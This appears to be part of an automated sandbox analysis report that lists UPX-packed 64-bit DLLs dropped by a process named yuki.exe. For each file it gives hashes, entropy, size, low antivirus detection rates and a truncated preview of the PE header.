                                                                                                    File Type:PE32+ executable (DLL) (GUI) x86-64, for MS Windows
                                                                                                    Category:dropped
                                                                                                    Size (bytes):10240
                                                                                                    Entropy (8bit):6.763072209111107
                                                                                                    Encrypted:false
                                                                                                    SSDEEP:192:jrOwIMFi0ZIPRKLZm2HIKI7FojkYj273QJX93qz:jrKMFiFKLZzHILojZa7gJXA
                                                                                                    MD5:E116F8C6A7376154E6610A6B9BBD7D87
                                                                                                    SHA1:482465FD942B06A3149149B0A16B9EBADCD19065
                                                                                                    SHA-256:6A44880996AEBA9B04ACF3383E9A5ACC93682FE66644A9E2BC3EA5DEFC08E09B
                                                                                                    SHA-512:EB5297B05C18F1DABB3426928D8431A7113390398C5D135C0DA1E21B8F9CDE3B0A3925DECEACB68AB488E85ACECA31660B49EBD8E67C991891CC93BB235FF7D5
                                                                                                    Malicious:false
                                                                                                    Antivirus:
                                                                                                    • Antivirus: ReversingLabs, Detection: 0%
                                                                                                    Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......~.g.:...:...:...3...>...h...8...q...9...:.......h...1...h...2...h...9.......;.......;.......;.......;...Rich:...................PE..d....B.f.........." ..... .......p..@.....................................................`.........................................L..........\............P..X...................................................@...8...........................................UPX0.....p..............................UPX1..... ....... ..................@....rsrc................$..............@..............................................................................................................................................................................................................................................................................................................................................................4.24.UPX!.$..
                                                                                                    Process:C:\Users\user\Desktop\yuki.exe
                                                                                                    File Type:PE32+ executable (DLL) (GUI) x86-64, for MS Windows
                                                                                                    Category:dropped
                                                                                                    Size (bytes):10752
                                                                                                    Entropy (8bit):6.915600305133218
                                                                                                    Encrypted:false
                                                                                                    SSDEEP:192:kQjcBJuphELbARkRzWJ9v07xyhAEkxWkYj273QJXXnYvo:E/ACRzcvW2AEUWZa7gJXA
                                                                                                    MD5:8257838724A8517ACA79B0B8D8147E8E
                                                                                                    SHA1:454E4080DD7A522C11B76A21D6BA74047BBEFD6B
                                                                                                    SHA-256:D4DFB84D0ABD477A3CDE6EC9CC66C5156F2FD5F32E526A2C54F1C14A69A60EB3
                                                                                                    SHA-512:010630578D001D863A4BBE556094FD48C4ACB30EF7B5372E6CAE908B731D1C206FAFA814DFE1EE6E07B5BE1366B2DBBE5CA163D15C0FB0BA87E68A60526934B0
                                                                                                    Malicious:false
                                                                                                    Antivirus:
                                                                                                    • Antivirus: ReversingLabs, Detection: 0%
                                                                                                    Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......r^..6?..6?..6?..?G..2?..dJ..4?..}G..5?..6?...?..dJ..<?..dJ..>?..dJ..5?...J..7?...J..7?...Jk.7?...J..7?..Rich6?..................PE..d....B.f.........." .....0.......p........................................................`.........................................L..........\............P..d.......................................................8...........................................UPX0.....p..............................UPX1.....0......."..................@....rsrc................&..............@..............................................................................................................................................................................................................................................................................................................................................................4.24.UPX!.$..
                                                                                                    Process:C:\Users\user\Desktop\yuki.exe
                                                                                                    File Type:PE32+ executable (DLL) (GUI) x86-64, for MS Windows
                                                                                                    Category:dropped
                                                                                                    Size (bytes):11264
                                                                                                    Entropy (8bit):6.899588298720918
                                                                                                    Encrypted:false
                                                                                                    SSDEEP:192:vWNPs19OtUVkzxt8b3jKdr7ag3qkYj273QJX1n2P:vyo9OtPGbGd3ag3qZa7gJXk
                                                                                                    MD5:D9AA56216FD9B7443B5431E3964668F3
                                                                                                    SHA1:4B669A98DD70CC364ADFCA2A6A5BB00986F8FA19
                                                                                                    SHA-256:06B9A3AC04E09F51296261F1E3178DEE84038FEA11A33EFC76E71430506BDFD7
                                                                                                    SHA-512:6A497C25309C1E233375DF92ED7CB3E680371D4CE07A7F8B96F70C84565FDD07E81E6F93DFB083DE8D7E6DD38302DE4A478D95D7C5016D6301E81FED4FF908CB
                                                                                                    Malicious:false
                                                                                                    Antivirus:
                                                                                                    • Antivirus: ReversingLabs, Detection: 0%
                                                                                                    Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......r^z.6?..6?..6?..?G..2?..dJ..4?..}G..5?..6?...?..dJ..<?..dJ..>?..dJ..5?...J..7?...J..7?...J..7?...J..7?..Rich6?..........................PE..d....B.f.........." .....0.......p........................................................`.........................................L..........\............P..........................................................8...........................................UPX0.....p..............................UPX1.....0.......$..................@....rsrc................(..............@......................................................................................................................................................................................................................................................................................................................................................4.24.UPX!.$..
                                                                                                    Process:C:\Users\user\Desktop\yuki.exe
                                                                                                    File Type:PE32+ executable (DLL) (GUI) x86-64, for MS Windows
                                                                                                    Category:dropped
                                                                                                    Size (bytes):17408
                                                                                                    Entropy (8bit):7.45225908924745
                                                                                                    Encrypted:false
                                                                                                    SSDEEP:384:ybXqmPF0yHaseAZ2OC4uCDeR0IjhP6nZa7gJXQ:YXPajsw41GjjYpg
                                                                                                    MD5:5B340FAC8A1C1FE8A60598B329EB55DB
                                                                                                    SHA1:0BB5614EE50C6DE644D6D3A45568AD8913414316
                                                                                                    SHA-256:D8B05D5ACAECCB1679E548EECB82692230F295D51615A7036B59D70201E466C4
                                                                                                    SHA-512:0D25C288343138F158320B55A77F06421AE76DE2539C287519144CEF5420AAA803D88443B9D1FD691B44868A2E527C8152A1783DEAA0E8D9904796E177FFB68A
                                                                                                    Malicious:false
                                                                                                    Antivirus:
                                                                                                    • Antivirus: ReversingLabs, Detection: 0%
                                                                                                    Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........PK..1%..1%..1%..I...1%.D$..1%.I$..1%..1$..1%.D ..1%.D!..1%.D&..1%..D-..1%..D%..1%..D...1%..D'..1%.Rich.1%.........................PE..d....B.f.........." .....@...........M... ...................................p............`.........................................Lb.......`..\....`..........l............b.......................................Y..8...........................................UPX0....................................UPX1.....@... ...<..................@....rsrc........`.......@..............@......................................................................................................................................................................................................................................................................................................................................................4.24.UPX!.$..
                                                                                                    Process:C:\Users\user\Desktop\yuki.exe
                                                                                                    File Type:PE32+ executable (DLL) (GUI) x86-64, for MS Windows
                                                                                                    Category:dropped
                                                                                                    Size (bytes):17408
                                                                                                    Entropy (8bit):7.5271086900297135
                                                                                                    Encrypted:false
                                                                                                    SSDEEP:384:pXqvtGBvrj1exl5PSYSI5SFDzgJ+LZa7gJXn:py0BTMgYFAFD8JSpX
                                                                                                    MD5:E62B025849868F0DCDEF72FF46C8C5FF
                                                                                                    SHA1:A141CD9054FFB82F69B392FC92D21D1528F419F2
                                                                                                    SHA-256:86A007FE978C6F79720DA81208FDFD1985BD6DCA4EC18D318EA671FEF466F5B7
                                                                                                    SHA-512:BE9DEDD887A091C7959D2E7AC49DD8FC82C88ADABC8909A3D294695C9C1E3653DD13215C75AFC3CF82206B0B570CFFABC48DD004D47DFF72D061EB34C46765F0
                                                                                                    Malicious:false
                                                                                                    Antivirus:
                                                                                                    • Antivirus: ReversingLabs, Detection: 0%
                                                                                                    Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........PK..1%..1%..1%..I...1%.D$..1%.I$..1%..1$..1%.D ..1%.D!..1%.D&..1%..D-..1%..D%..1%..D...1%..D'..1%.Rich.1%.........................PE..d....B.f.........." .....@...........N... ...................................p............`.........................................Lb.......`..\....`.......................b.......................................Z..8...........................................UPX0....................................UPX1.....@... ...<..................@....rsrc........`.......@..............@......................................................................................................................................................................................................................................................................................................................................................4.24.UPX!.$..
                                                                                                    Process:C:\Users\user\Desktop\yuki.exe
                                                                                                    File Type:PE32+ executable (DLL) (GUI) x86-64, for MS Windows
                                                                                                    Category:dropped
                                                                                                    Size (bytes):9216
                                                                                                    Entropy (8bit):6.748613710874415
                                                                                                    Encrypted:false
                                                                                                    SSDEEP:192:P51jwkl3nSW/ZHd8M/retkYj273QJXpHz:P5CkwWtSMDetZa7gJXZ
                                                                                                    MD5:5CA4837FC45CD28F290B54BD2E0A67F5
                                                                                                    SHA1:8AAEE26A61A0945DDAFFDBF9FD2A87272EEB8822
                                                                                                    SHA-256:77ECE4EFFAE2152C6B2E70945CE0779B95B5CA8ECD29B3A6E857B95461399534
                                                                                                    SHA-512:D6F0D2B572CC770D8C452D4D2DF575C3B988DC6490A506C5602AB4599E88502E1555F5C1AF33582295380C9E56D46FF9CCDE9A5DBA61776958173ECE4C1C64C6
                                                                                                    Malicious:false
                                                                                                    Antivirus:
                                                                                                    • Antivirus: ReversingLabs, Detection: 3%
                                                                                                    Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.........@................../....../...../......+.......*......-......&....................,....Rich...........................PE..d....B.f.........." ..... .......p........................................................`.................................................................@..........................................................8...........................................UPX0.....p..............................UPX1..... ..........................@....rsrc................ ..............@......................................................................................................................................................................................................................................................................................................................................................4.24.UPX!.$..
                                                                                                    Process:C:\Users\user\Desktop\yuki.exe
                                                                                                    File Type:PE32+ executable (DLL) (GUI) x86-64, for MS Windows
                                                                                                    Category:dropped
                                                                                                    Size (bytes):15872
                                                                                                    Entropy (8bit):7.388461503699212
                                                                                                    Encrypted:false
                                                                                                    SSDEEP:384:bzW51OWrPlPXRWkplBxnEgTiD+Za7gJXaf:bzW51O4lPBJpTLTiCpq
                                                                                                    MD5:8646BD937418C50B42D7582DBFF2002C
                                                                                                    SHA1:6A4597A720AC1898712E4B94855A700B7E905E55
                                                                                                    SHA-256:394B2281FC1445195B31777C46EA58E23073B9228F791E0619B0B762F09A2E29
                                                                                                    SHA-512:FDF8BF1A01DA4ABFBF0426BBC3E7AD6988C81FBB65D9B28EAC0FBE09E6CDC225F2FF2D4BD66938B7DC73978968AC39564FD6EE4E8EA566689DF0A0A82E27B561
                                                                                                    Malicious:false
                                                                                                    Antivirus:
                                                                                                    • Antivirus: ReversingLabs, Detection: 0%
                                                                                                    Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......~.g.:...:...:...3...>...h...8...q...9...:.......h...1...h...2...h...9.......;.......;.......;.......;...Rich:...................PE..d....B.f.........." .....@...............................................................`.........................................L...........\............p..........................................................8...........................................UPX0....................................UPX1.....@.......6..................@....rsrc................:..............@..............................................................................................................................................................................................................................................................................................................................................................4.24.UPX!.$..
                                                                                                    Process:C:\Users\user\Desktop\yuki.exe
                                                                                                    File Type:PE32+ executable (DLL) (GUI) x86-64, for MS Windows
                                                                                                    Category:dropped
                                                                                                    Size (bytes):11776
                                                                                                    Entropy (8bit):6.956704833587183
                                                                                                    Encrypted:false
                                                                                                    SSDEEP:192:m3LNqWu7xr5InY8MmVO+AHO4dgOieWNkYj273QJXRHPnX:8vuZ/3xHO4dx1IZa7gJX1X
                                                                                                    MD5:58DF499FB55A2DF3BB895DD43FC4CBCE
                                                                                                    SHA1:4FBEB2493D4F4DD927EAC90B94D0448F39461485
                                                                                                    SHA-256:4D40BD4FD03C55B8B0FE6376DC6742E9B4CD561692B834CF1BBA6D9C75DE4161
                                                                                                    SHA-512:E7952C7022D4631232D2F0EF9BB4679FF607E9E96026087231C6FF2A1492D0568676A1ECC55381D0AA344D442A19F261514BA28D657FA1B401305211035DD5F9
                                                                                                    Malicious:false
                                                                                                    Antivirus:
                                                                                                    • Antivirus: ReversingLabs, Detection: 0%
                                                                                                    Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......~.G.:.).:.).:.).3...>.).h.(.8.).q.(.9.).:.(...).h.,.1.).h.-.2.).h.*.9.)...!.;.)...).;.).....;.)...+.;.).Rich:.).........................PE..d....B.f.........." .....0...............................................................`.........................................L...........\............`..............H..........................................8...........................................UPX0....................................UPX1.....0.......&..................@....rsrc................*..............@......................................................................................................................................................................................................................................................................................................................................................4.24.UPX!.$..
                                                                                                    Process:C:\Users\user\Desktop\yuki.exe
                                                                                                    File Type:PE32+ executable (DLL) (GUI) x86-64, for MS Windows
                                                                                                    Category:dropped
                                                                                                    Size (bytes):10240
                                                                                                    Entropy (8bit):6.707786287792808
                                                                                                    Encrypted:false
                                                                                                    SSDEEP:192:aMrOwIMFi0ZIPRK4EtpwEHW8SVkYj273QJXD3pT:aMrKMFiFK4KL28SVZa7gJXV
                                                                                                    MD5:A1AC6B0EA42C29F07B7A0849087DFAF1
                                                                                                    SHA1:564FECFD6BB4377F054FBCC834C3D9D74A368F4A
                                                                                                    SHA-256:312BAA2D21284EAE2C6EF054404A2E6672D8DF0A37FDC5DBB295783CEFF59DB8
                                                                                                    SHA-512:399B4683491377492BF24212136A21C00CB2DE789F52DCCD16566D4275319100C1D75964B21666C8D0856D833E2DE499439BA67222226875E64D791D1C657A36
                                                                                                    Malicious:false
                                                                                                    Antivirus:
                                                                                                    • Antivirus: ReversingLabs, Detection: 0%
                                                                                                    Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......~.g.:...:...:...3...>...h...8...q...9...:.......h...1...h...2...h...9.......;.......;.......;.......;...Rich:...................PE..d....B.f.........." ..... .......p........................................................`.........................................L..........\............P..X.......................................................8...........................................UPX0.....p..............................UPX1..... ....... ..................@....rsrc................$..............@..............................................................................................................................................................................................................................................................................................................................................................4.24.UPX!.$..
                                                                                                    Process:C:\Users\user\Desktop\yuki.exe
                                                                                                    File Type:PE32+ executable (DLL) (GUI) x86-64, for MS Windows
                                                                                                    Category:dropped
                                                                                                    Size (bytes):11264
                                                                                                    Entropy (8bit):7.068591256304915
                                                                                                    Encrypted:false
                                                                                                    SSDEEP:192:7urOwIMFi0ZI2ZdnYIvCVCZKCyvkYj273QJX1nre30:KrKMFiKZdnScZVyvZa7gJXdO
                                                                                                    MD5:1DD074C11A4EF7A5B376BE6CC1CA0E3D
                                                                                                    SHA1:774DA8EF58C3EF8F638914C73EAF793508C0961A
                                                                                                    SHA-256:AA8F4127FC1A390050814698524935016C1DCF17F817EF90F27C1A6872B01B9B
                                                                                                    SHA-512:755D021A265116F13CCB84016FBDD32CD4DE02F4BB026C757029C2B27432846B6C08A9B6A3C125A1BCFF04113AA583629CB5E97A9DC4784B6DB7E3FE8B910B6B
                                                                                                    Malicious:false
                                                                                                    Antivirus:
                                                                                                    • Antivirus: ReversingLabs, Detection: 0%
                                                                                                    Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......~.g.:...:...:...3...>...h...8...q...9...:.......h...1...h...2...h...9.......;.......;.......;.......;...Rich:...................PE..d....B.f.........." .....0.......p..0.....................................................`.........................................L..........\............P..@...................................................0...8...........................................UPX0.....p..............................UPX1.....0.......$..................@....rsrc................(..............@..............................................................................................................................................................................................................................................................................................................................................................4.24.UPX!.$..
                                                                                                    Process:C:\Users\user\Desktop\yuki.exe
                                                                                                    File Type:PE32+ executable (DLL) (GUI) x86-64, for MS Windows
                                                                                                    Category:dropped
                                                                                                    Size (bytes):11264
                                                                                                    Entropy (8bit):7.000866222279469
                                                                                                    Encrypted:false
                                                                                                    SSDEEP:192:qOqrOwIMFi0ZI2b8JcuFqNF4m2nlQXku1GhkYj273QJXbnKu3p:6rKMFiKgJcuUNFEeP1GhZa7gJX2+
                                                                                                    MD5:B045025263FA214A5047E99DE3240FA1
                                                                                                    SHA1:555C399E79B708E8129EACF4E014E48F40DF08A2
                                                                                                    SHA-256:66C2FDCCC5E1398558B11168CBF8AB29E7D13F2D5A33E66FBA017BB0E436FE80
                                                                                                    SHA-512:F66DCC3B7808DA4A768C9C21D1D99DE1360C0CEF77F61902D2DBCB21CD7D05FE6E35ED9D0632BC824A6E332C7A78AFA80DAF303E1D11CC8FB7EDBF38799AD544
                                                                                                    Malicious:false
                                                                                                    Antivirus:
                                                                                                    • Antivirus: ReversingLabs, Detection: 0%
                                                                                                    Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......~.g.:...:...:...3...>...h...8...q...9...:.......h...1...h...2...h...9.......;.......;.......;.......;...Rich:...................PE..d....B.f.........." .....0.......p........................................................`.........................................L..........\............P..@.......................................................8...........................................UPX0.....p..............................UPX1.....0.......$..................@....rsrc................(..............@..............................................................................................................................................................................................................................................................................................................................................................4.24.UPX!.$..
                                                                                                    Process:C:\Users\user\Desktop\yuki.exe
                                                                                                    File Type:PE32+ executable (DLL) (GUI) x86-64, for MS Windows
                                                                                                    Category:dropped
                                                                                                    Size (bytes):10752
                                                                                                    Entropy (8bit):6.904887755335672
                                                                                                    Encrypted:false
                                                                                                    SSDEEP:192:jC1XDqrH2n4sLKhXRJRzkQMz0jofHNkYj273QJXinoY/R:8qryjyXRLAQE08fHNZa7gJXl8R
                                                                                                    MD5:8B31640091C9BA6E7032F6BB68F88EBF
                                                                                                    SHA1:CA48B8D3369066B2B75E4EA1B6933B1C57FE93E7
                                                                                                    SHA-256:A98FBC2EFCDB4DAF4FEEE163F56F7C5C0290E536C1EA4B3E9A092FA99963E54C
                                                                                                    SHA-512:1BAC328EC7D9A7C0A3806494414C9DA22227356F6D711EE33ADC0771BA3FF52D79CEA686EBF563F0016F1CB88560141EEA0A851DFA891D52B9EAE331BA846293
                                                                                                    Malicious:false
                                                                                                    Antivirus:
                                                                                                    • Antivirus: ReversingLabs, Detection: 0%
                                                                                                    Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......~.G.:.).:.).:.).3...>.).h.(.8.).q.(.9.).:.(...).h.,.1.).h.-.2.).h.*.9.)...!.;.)...).;.).....;.)...+.;.).Rich:.).........................PE..d....B.f.........." .....0.......p........................................................`.........................................L..........\............P..(...............$.......................................8...........................................UPX0.....p..............................UPX1.....0......."..................@....rsrc................&..............@......................................................................................................................................................................................................................................................................................................................................................4.24.UPX!.$..
                                                                                                    Process:C:\Users\user\Desktop\yuki.exe
                                                                                                    File Type:PE32+ executable (DLL) (GUI) x86-64, for MS Windows
                                                                                                    Category:dropped
                                                                                                    Size (bytes):10752
                                                                                                    Entropy (8bit):6.983907880110874
                                                                                                    Encrypted:false
                                                                                                    SSDEEP:192:mJm23TF55OsDTBHeLMU+0w+Ei0J/Tta+kHYkYj273QJXbnBokQ:uzUsDTt0y+iFqYZa7gJX9HQ
                                                                                                    MD5:6A1B049B13ABBDAE8E70E5C8629B9CB1
                                                                                                    SHA1:4C53EBB5BC9E76D0DA94A704F39FEA7CC2FE3388
                                                                                                    SHA-256:CAF2B6E6EF7AEA318AB4358B8EF64B2498C2960984B704AD5622FCDCE65EB606
                                                                                                    SHA-512:BB36596F220B21FB2A9AFC28288B7A9857E7E1A20ACEF77CBB9E217B814ABF798C8D45190C6A909C21611336CA29FAEC8830046AE545B8A61B74BE0BA020C9AA
                                                                                                    Malicious:false
                                                                                                    Antivirus:
                                                                                                    • Antivirus: ReversingLabs, Detection: 0%
                                                                                                    Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......~.G.:.).:.).:.).3...>.).h.(.8.).q.(.9.).:.(...).h.,.1.).h.-.2.).h.*.9.)...!.;.)...).;.).....;.)...+.;.).Rich:.).........................PE..d....B.f.........." .....0.......p..0.....................................................`.........................................L..........\............P..(...................................................0...8...........................................UPX0.....p..............................UPX1.....0......."..................@....rsrc................&..............@......................................................................................................................................................................................................................................................................................................................................................4.24.UPX!.$..
                                                                                                    Process:C:\Users\user\Desktop\yuki.exe
                                                                                                    File Type:PE32+ executable (DLL) (GUI) x86-64, for MS Windows
                                                                                                    Category:dropped
                                                                                                    Size (bytes):12288
                                                                                                    Entropy (8bit):7.097480895716663
                                                                                                    Encrypted:false
                                                                                                    SSDEEP:192:un1clPrWUqC02ilACSK7TzeWT1ekG4HDQr+Hh2i58gD9uzAFyCeJkYj273QJXZn7:eClPrr02SNPSmJG4rMimnJZa7gJXQ
                                                                                                    MD5:3230E1ECFBAAA7406E059C481DF71D00
                                                                                                    SHA1:012C24B1758D8A51A3D0C18DBE20542D24D3FCC1
                                                                                                    SHA-256:77B2B80E0CA6E90C08585A4C6396588B6BAC27BAA60E810BE66879E405E713BF
                                                                                                    SHA-512:9A6E9B8335340158C8CD93F7CC2D5621873C1C263A80CBAF8E27AB87DB648C12EF830D630C7E15897B8697FAE7731F0897A528DAD9DA6A40660A6E5083AD591E
                                                                                                    Malicious:false
                                                                                                    Antivirus:
                                                                                                    • Antivirus: ReversingLabs, Detection: 0%
                                                                                                    Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......~.G.:.).:.).:.).3...>.).h.(.8.).q.(.9.).:.(...).h.,.1.).h.-.2.).h.*.9.)...!.;.)...).;.).....;.)...+.;.).Rich:.).........................PE..d....B.f.........." .....0.......p........................................................`.........................................L..........\............P..X.......................................................8...........................................UPX0.....p..............................UPX1.....0.......(..................@....rsrc................,..............@......................................................................................................................................................................................................................................................................................................................................................4.24.UPX!.$..
                                                                                                    Process:C:\Users\user\Desktop\yuki.exe
                                                                                                    File Type:PE32+ executable (DLL) (GUI) x86-64, for MS Windows
                                                                                                    Category:dropped
                                                                                                    Size (bytes):10752
                                                                                                    Entropy (8bit):7.0862120258622125
                                                                                                    Encrypted:false
                                                                                                    SSDEEP:192:YRrOwIMFi0ZI+5/f8WjXICC4eGi//I/qkYj273QJXhnt/u:grKMFiqhfFXIRhDg/qZa7gJXX2
                                                                                                    MD5:99578793AF263520592F4A591E1145E5
                                                                                                    SHA1:A555806881BFEDCB7CCD6521EF03345191B9D43E
                                                                                                    SHA-256:06C01F5E5E18FA4B6943520A94B64AC4E9E0E5AE72A1DEE5A66F38145DF46D4F
                                                                                                    SHA-512:AEB40B897815F24C4DB87A18748193DCFAA4B4B6F41E8FC1506115D8527295C2BCE52D4B98CAA0B8B0137CDB35F8F328B0BA62029197EC4308966E25D1C271D0
                                                                                                    Malicious:false
                                                                                                    Antivirus:
                                                                                                    • Antivirus: ReversingLabs, Detection: 0%
                                                                                                    Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......~.g.:...:...:...3...>...h...8...q...9...:.......h...1...h...2...h...9.......;.......;.......;.......;...Rich:...................PE..d....B.f.........." .....0.......p........................................................`.........................................L..........\............P..............$...........................................8...........................................UPX0.....p..............................UPX1.....0......."..................@....rsrc................&..............@..............................................................................................................................................................................................................................................................................................................................................................4.24.UPX!.$..
                                                                                                    Process:C:\Users\user\Desktop\yuki.exe
                                                                                                    File Type:PE32+ executable (DLL) (GUI) x86-64, for MS Windows
                                                                                                    Category:dropped
                                                                                                    Size (bytes):13312
                                                                                                    Entropy (8bit):7.2167531927207245
                                                                                                    Encrypted:false
                                                                                                    SSDEEP:192:G3LNqWu7xr5e0B08ZKY34+170LmTIHeIQUAR2TkYj273QJXLH68:cvuJRZr/1SSIHS5aZa7gJX2
                                                                                                    MD5:A7842C3F92F6F6EFF367B97BBC2B6102
                                                                                                    SHA1:CEE3D69682FBB560748C6D2A7D83BF668287E7B9
                                                                                                    SHA-256:315788043C7964CD2B5C887EC2BE990C05B071683F13D425F6E4127940F9FE1A
                                                                                                    SHA-512:092D431F50A3D4B06929296B996A510A39A4EEBC1A1B77895A2857CFE652DB6F348D9C57E777854D5689445F26F47FA2CA87140D84BB2F2F6F2FC7536840440C
                                                                                                    Malicious:false
                                                                                                    Antivirus:
                                                                                                    • Antivirus: ReversingLabs, Detection: 0%
                                                                                                    Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......~.G.:.).:.).:.).3...>.).h.(.8.).q.(.9.).:.(...).h.,.1.).h.-.2.).h.*.9.)...!.;.)...).;.).....;.)...+.;.).Rich:.).........................PE..d....B.f.........." .....0...............................................................`.........................................L...........\............`..X...........$..........................................8...........................................UPX0....................................UPX1.....0.......,..................@....rsrc................0..............@......................................................................................................................................................................................................................................................................................................................................................4.24.UPX!.$..
                                                                                                    Process:C:\Users\user\Desktop\yuki.exe
                                                                                                    File Type:PE32+ executable (DLL) (GUI) x86-64, for MS Windows
                                                                                                    Category:dropped
                                                                                                    Size (bytes):14848
                                                                                                    Entropy (8bit):7.25730148801507
                                                                                                    Encrypted:false
                                                                                                    SSDEEP:384:/5bL5JdKCy6Lqo3CxYzoA+sm/Nd6tZa7gJXb:/Nd86LfCyzoA3mlipL
                                                                                                    MD5:84DEE4772C2448FE59EF9710B26DEB70
                                                                                                    SHA1:1C6ADC59EBF77A8ADD97C91C5DC3FE2B14F8286C
                                                                                                    SHA-256:B6B1AFD1F2ABB236CE89A84ABFC8930DA7F2D938D2DFF0321B39AB6624E3C107
                                                                                                    SHA-512:4A4ADCD34B9EDD6CD0A12AA46C69B071CD6E5EFA62C2467FA70031BB754F74342E9BDAB38B8045532AA2A5D3E5FE91E849150E00BD47203A83FCCC38C95B7C67
                                                                                                    Malicious:false
                                                                                                    Antivirus:
                                                                                                    • Antivirus: ReversingLabs, Detection: 0%
                                                                                                    Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......~.G.:.).:.).:.).3...>.).h.(.8.).q.(.9.).:.(...).h.,.1.).h.-.2.).h.*.9.)...!.;.)...).;.).....;.)...+.;.).Rich:.).........................PE..d....B.f.........." .....@...............................................................`.........................................L...........\............p..............4... ......................................8...........................................UPX0....................................UPX1.....@.......2..................@....rsrc................6..............@......................................................................................................................................................................................................................................................................................................................................................4.24.UPX!.$..
                                                                                                    Process:C:\Users\user\Desktop\yuki.exe
                                                                                                    File Type:PE32+ executable (DLL) (GUI) x86-64, for MS Windows
                                                                                                    Category:dropped
                                                                                                    Size (bytes):14848
                                                                                                    Entropy (8bit):7.257922783553551
                                                                                                    Encrypted:false
                                                                                                    SSDEEP:384:n5bL5JdKCy6L/58g+eYXELL43mi12j9+YPZa7gJXb:nNd86L/yNjULLK1qospL
                                                                                                    MD5:A7B3AA9442D0F0591533EFCBA15BBDA0
                                                                                                    SHA1:38CE95337D39B97AE51AC8E7F18332834DCEEABE
                                                                                                    SHA-256:61AF39842B76E0ACF21A06757B6766725E3F581D52388119384C61167F26066E
                                                                                                    SHA-512:522EFDB0347D52FBEDEDF663EF2B3009B777359372B219DAB6850F31C5DA4D732C6E3269C76FC9BB5B584293861E326861B7F6590596F5A71ADB6DEE2F674D07
                                                                                                    Malicious:false
                                                                                                    Antivirus:
                                                                                                    • Antivirus: ReversingLabs, Detection: 0%
                                                                                                    Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......~.G.:.).:.).:.).3...>.).h.(.8.).q.(.9.).:.(...).h.,.1.).h.-.2.).h.*.9.)...!.;.)...).;.).....;.)...+.;.).Rich:.).........................PE..d....B.f.........." .....@...............................................................`.........................................L...........\............p..............4... ......................................8...........................................UPX0....................................UPX1.....@.......2..................@....rsrc................6..............@......................................................................................................................................................................................................................................................................................................................................................4.24.UPX!.$..
                                                                                                    Process:C:\Users\user\Desktop\yuki.exe
                                                                                                    File Type:PE32+ executable (DLL) (GUI) x86-64, for MS Windows
                                                                                                    Category:dropped
                                                                                                    Size (bytes):15360
                                                                                                    Entropy (8bit):7.335755435809611
                                                                                                    Encrypted:false
                                                                                                    SSDEEP:384:5aQeWO7PzpfLJigFDR0h7UiBKgcDZa7gJXd:uWCPlfVh3y7DBqpt
                                                                                                    MD5:6CA018B74B76E1E2B8FCF4CE07C303AA
                                                                                                    SHA1:BE091FE1D44920FD9DE07AAF37E01A20A1648496
                                                                                                    SHA-256:DC4EB71114E4AB1F4B01A3644D882F3CD044CABF645F69AF6DEF559173CB5C39
                                                                                                    SHA-512:54B645AE48FA108FFBE6A96B0C307B27E1C4C260012AD9466B5EBC27C35882E65732584AAE74FE837F0FD0C1EB71A80582516C16F5C7854687EEEDB3EC5AEB82
                                                                                                    Malicious:false
                                                                                                    Antivirus:
                                                                                                    • Antivirus: ReversingLabs, Detection: 0%
                                                                                                    Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......~.G.:.).:.).:.).3...>.).h.(.8.).q.(.9.).:.(...).h.,.1.).h.-.2.).h.*.9.)...!.;.)...).;.).....;.)...+.;.).Rich:.).........................PE..d....B.f.........." .....@..........p.....................................................`.........................................L...........\...........................4.......................................p...8...........................................UPX0....................................UPX1.....@.......4..................@....rsrc................8..............@......................................................................................................................................................................................................................................................................................................................................................4.24.UPX!.$..
                                                                                                    Process:C:\Users\user\Desktop\yuki.exe
                                                                                                    File Type:PE32+ executable (DLL) (GUI) x86-64, for MS Windows
                                                                                                    Category:dropped
                                                                                                    Size (bytes):15360
                                                                                                    Entropy (8bit):7.409839557756001
                                                                                                    Encrypted:false
                                                                                                    SSDEEP:384:laQeWdfOexy9B3MC0uklIrDOxnvZa7gJXQ:6Wg2yjF0GDOxvpg
                                                                                                    MD5:9596A926BE1B802943D69CD72F085875
                                                                                                    SHA1:0CD070F5187D2E5AB23D207F3BAD9803CF5D59BF
                                                                                                    SHA-256:3366F9B1582D55B26D6B1A0FFB1FB048FCC4F39A743435F34FEE6EFA513AF68A
                                                                                                    SHA-512:B7BB2EE7C889AB89E970904B86FC897CF1D91DDD6CABB9A619C729E040590530CD5AF14B028FE3952ABB424291306853C4B098008221E0FD8B1448A25BC3E158
                                                                                                    Malicious:false
                                                                                                    Antivirus:
                                                                                                    • Antivirus: ReversingLabs, Detection: 0%
                                                                                                    Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......~.G.:.).:.).:.).3...>.).h.(.8.).q.(.9.).:.(...).h.,.1.).h.-.2.).h.*.9.)...!.;.)...).;.).....;.)...+.;.).Rich:.).........................PE..d....B.f.........." .....@..........@.....................................................`.........................................L...........\...........................4.......................................@...8...........................................UPX0....................................UPX1.....@.......4..................@....rsrc................8..............@......................................................................................................................................................................................................................................................................................................................................................4.24.UPX!.$..
                                                                                                    Process:C:\Users\user\Desktop\yuki.exe
                                                                                                    File Type:PE32+ executable (DLL) (GUI) x86-64, for MS Windows
                                                                                                    Category:dropped
                                                                                                    Size (bytes):10240
                                                                                                    Entropy (8bit):6.966315070107828
                                                                                                    Encrypted:false
                                                                                                    SSDEEP:192:d+e1CChUEjQPmO8MkWRlRJ/UB6FRsc6LUHkYj273QJXu3bpt:8JVFlUB6jsclHZa7gJX2
